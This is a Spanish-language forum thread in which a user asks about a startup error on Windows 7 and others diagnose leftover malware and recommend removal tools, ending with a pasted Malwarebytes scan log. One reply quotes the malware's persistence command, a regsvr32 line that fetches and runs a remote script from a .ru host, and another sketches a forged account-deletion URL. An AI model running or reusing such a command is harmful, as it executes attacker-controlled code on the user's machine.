¿Que cosa es esta que me sale al inicio de mi Windows 7?

Iniciado por Machacador, 16 Septiembre 2018, 00:26 AM

0 Miembros y 1 Visitante están viendo este tema.

Machacador

Saludos  gente... les muestro objeto que me sale al inicio y no se lo que es ni como eliminarlo... les  agradezco cualquier ayuda...


:rolleyes: :o :rolleyes:

Saludos.
"Solo tu perro puede admirarte mas de lo que tu te admiras a ti mismo"

#!drvy

#1
Por la url en el titulo, me da que es malware.
Creo que ya sabes que hacer.

PD: La url completa deberia ser http://server2.39slxu3bw.ru/restore.xml, por lo visto ese archivo ya no existe o no se muestra (de ahí que salte el error de que no hay componentes [en el archivo XML]). Tal y como lo veo, parece ser una botnet olvidada o suspendida.

PD2: Investigando un poco más, puedes encontrar analisis que han hecho otros:
https://www.reverse.it/sample/0f65931cb369b3c9edee1fe66224bf98cc63b69c2f2c9113329c1f03519885dd?environmentId=100
https://www.virustotal.com/es/file/198dbf18747c4592fcce43c3b1c45f9706f9c3fb781e8ac9f23f0c2418caa5ca/analysis/1507063666/

En especial, te interesa esto:
%WINDIR%\system32\regsvr32.exe /s /n /u /i:http://server2.39slxu3bw.ru/restore.xml scrobj.dll"



Saludos

OmarHack

#2
Es malware lamer te roba información personal y lo incluye en bases de datos.
Tiene control absoluto sobre el sistema para hacer lo que le de la gana.
Yo en tu caso, formateria el disco duro, revisaría la seguridad de la red para ver que no ha sido comprometida, y cambiaría claves de todas las cuentas y correos de todos los servicios a los que tengas acceso.
Por qué debes hacer esto si no ha pasado nada?
Porque tus datos puede que estén ahora mismo rondando por la web esperando a ser encontrados.
Existen webs para comprobar si tus datos han sido comprometidos y están accesibles de forma pública.
A parte de eso instala algún antivirus potente, firewall manual y utiliza herramientas online como virus total.com para analizar urls maliciosas y archivos.
También ten en cuenta que te pueden joder con urls ocultas como por ejemplo: elhacker.net/usuario/machacador/deleteaccount?deleteacc=true.confirm=true
Yo podría generar una URL así en mi web y se cargaría automáticamente si la visitases, o en una foto, o cualquier movida. Por lo que si tu sesión en elhacker.net está abierta, te borraría la cuenta automáticamente al entrar en mi web, si la página no se protegiese.
Por lo que no te puedes proteger solo con un av. Usa la cabeza.
I like to test things.

Machacador

Cita de: #!drvy en 16 Septiembre 2018, 00:41 AM
Por la url en el titulo, me da que es malware.
Creo que ya sabes que hacer.

PD: La url completa deberia ser http://server2.39slxu3bw.ru/restore.xml, por lo visto ese archivo ya no existe o no se muestra (de ahí que salte el error de que no hay componentes [en el archivo XML]). Tal y como lo veo, parece ser una botnet olvidada o suspendida.

PD2: Investigando un poco más, puedes encontrar analisis que han hecho otros:
https://www.reverse.it/sample/0f65931cb369b3c9edee1fe66224bf98cc63b69c2f2c9113329c1f03519885dd?environmentId=100
https://www.virustotal.com/es/file/198dbf18747c4592fcce43c3b1c45f9706f9c3fb781e8ac9f23f0c2418caa5ca/analysis/1507063666/

En especial, te interesa esto:
%WINDIR%\system32\regsvr32.exe /s /n /u /i:http://server2.39slxu3bw.ru/restore.xml scrobj.dll"

Saludos

Ya yo sabia que eran los restos de un bicho... la cosa es quería eliminar el mensajito al inicio y no hallo como... grrrr...

Y si... aquí ya no hay nada...






Cita de: OmarHack en 16 Septiembre 2018, 01:04 AM
Es malware lamer te roba información personal y lo incluye en bases de datos.
Tiene control absoluto sobre el sistema para hacer lo que le de la gana.
Yo en tu caso, formateria el disco duro, revisaría la seguridad de la red para ver que no ha sido comprometida, y cambiaría claves de todas las cuentas y correos de todos los servicios a los que tengas acceso.
Por qué debes hacer esto si no ha pasado nada?
Porque tus datos puede que estén ahora mismo rondando por la web esperando a ser encontrados.


Bueno amigo... este PC esta recen formateado y yo no le pongo ningún antivirus salvo el que trae por defecto Windows Defender...

El disco esta particionado y en el respaldo tengo muchos programas y otras cosas pero no hay infección alguna... lo único es que le meto muchos pendrives que me traen de oficinas publicas para cargarles películas y música y la mayoría de las veces me toca limpiarlos y librarlos de bichos... pero nunca me habia pasado esto de ese bendito cartel que es lo que me molesta y no he podido eliminar...




Aquí tampoco me sale nada que pueda eliminar del inicio... grrrrrr...



Puedo formatear nuevamente... pero sera mejor saber como eliminar esa basura...

:rolleyes: :o :rolleyes:

Saludos, y gracias por su tiempo y atención...
"Solo tu perro puede admirarte mas de lo que tu te admiras a ti mismo"

#!drvy

Recuerda mirar también en la carpeta "Startup" de los usuarios por lo que he visto, puede que se esconda tras un acceso directo "oculto".

PD: Yo pillaba MalwareBytes.. seguro que lo limpia.

Saludos

Machacador

Cita de: #!drvy en 16 Septiembre 2018, 02:51 AM
Recuerda mirar también en la carpeta "Startup" de los usuarios por lo que he visto, puede que se esconda tras un acceso directo "oculto".

PD: Yo pillaba MalwareBytes.. seguro que lo limpia.

Saludos

Ok... el MalwareBytes que tengo esta muy vejo y debo descargar uno nuevo pero son las 9 de la noche y a esta hora la red esta muy lenta por acá... en la madrugada lo descargo a ver que tal...

:rolleyes: :o :rolleyes:

Saludos.
"Solo tu perro puede admirarte mas de lo que tu te admiras a ti mismo"

OmarHack

Para sistemas windows uno de mis favoritos es https://www.zonealarm.com/software/free-antivirus/
Tiene modo para "jugar".
Y es bastante configurable.
I like to test things.

EdePC

Saludos,

- Jeje, que raro que le pasen estas cosas a Machacador  :xD. Lo más sencillo es descargar Process Explorer o mejor Process Hacker, luego cuando aparezca esa ventanita abres Process Explorer y revisas como se ha ejecutado, te muestra en forma de árbol el Padre del proceso, con esto lo encuentras rápido.

- Por otro lado Autoruns debería de mostrar la entrada, solo que es algo más laborioso de ir viendo línea a línea cual es la indicada. Recuerda que dependiendo de la complejidad del bicho, puede haberse embebido como un simple StartUp, un Servicio, una Tarea Programada, un driver,  etc.

Machacador

Cita de: EdePC en 16 Septiembre 2018, 06:56 AM
Saludos,

- Jeje, que raro que le pasen estas cosas a Machacador  :xD.


Naaaaaaa... lo que pasa es que yo soy un perro mas que todo LADRADOR (no confundir con LABRADOR), y el hecho de que sea tan activo en foro no quiere decir que me las sepa todas...  ::) >:D ::)... grrrrrrr...

Pero ya desapareció el cartelito... seguí los consejos del pana #!drvy y pase el MalwareBytes que estoy viendo ya no es free, o yo no lo encontré free, en su sitio solo esta la descarga del PREMIUM con 14 das de uso free... mas nada... me tocara prepararle una buena medicina si no es que lo desinstalo antes...

Acá el resultado del test:

Citar
Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del análisis: 16/9/18
Hora del análisis: 4:59
Archivo de registro: c72971f2-b98e-11e8-93bf-c89cdc1b41f0.json
Administrador: Sí

-Información del software-
Versión: 3.5.1.2522
Versión de los componentes: 1.0.365
Versión del paquete de actualización: 1.0.6859
Licencia: Prueba

-Información del sistema-
SO: Windows 7 Service Pack 1
CPU: x86
Sistema de archivos: NTFS
Usuario: Usuario-PC\Usuario

-Resumen del análisis-
Tipo de análisis: Análisis de amenazas
Análisis iniciado por:: Manual
Resultado: Completado
Objetos analizados: 159162
Amenazas detectadas: 3
Amenazas en cuarentena: 0
(No hay elementos maliciosos detectados)
Tiempo transcurrido: 14 min, 46 seg

-Opciones de análisis-
Memoria: Activado
Inicio: Activado
Sistema de archivos: Activado
Archivo: Activado
Rootkits: Desactivado
Heurística: Activado
PUP: Detectar
PUM: Detectar

-Detalles del análisis-
Proceso: 0
(No hay elementos maliciosos detectados)

Módulo: 0
(No hay elementos maliciosos detectados)

Clave del registro: 0
(No hay elementos maliciosos detectados)

Valor del registro: 1
Trojan.StartPage.Generic, HKU\S-1-5-21-3070638914-188476652-1373213167-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|COM+, Sin acciones por parte del usuario, [6914], [431314],1.0.6859

Datos del registro: 0
(No hay elementos maliciosos detectados)

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 0
(No hay elementos maliciosos detectados)

Archivo: 2
Adware.Elex.ShrtCln, C:\USERS\USUARIO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Sync Data\SyncData.sqlite3, Sin acciones por parte del usuario, [254], [454721],1.0.6859
Adware.Elex.ShrtCln, C:\USERS\USUARIO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Sin acciones por parte del usuario, [254], [454721],1.0.6859

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)

(end)

Gracias a todos por su atención y ayuda...

:rolleyes: :o :rolleyes:

Saludos.
"Solo tu perro puede admirarte mas de lo que tu te admiras a ti mismo"

PalitroqueZ

entra con win+r -> msconfig y busca en inicio de windows, te debe salir el nombre del bicho y el proceso de wscript.exe, debes desactivar ambos, luego busca la dirección del bicho y borralo.

y por ultimo pasale el adwcleaner.
"La Economía planificada lleva de un modo gradual pero seguro a la economía dirigida, a la economía autoritaria y al totalitarismo" Ludwig Erhard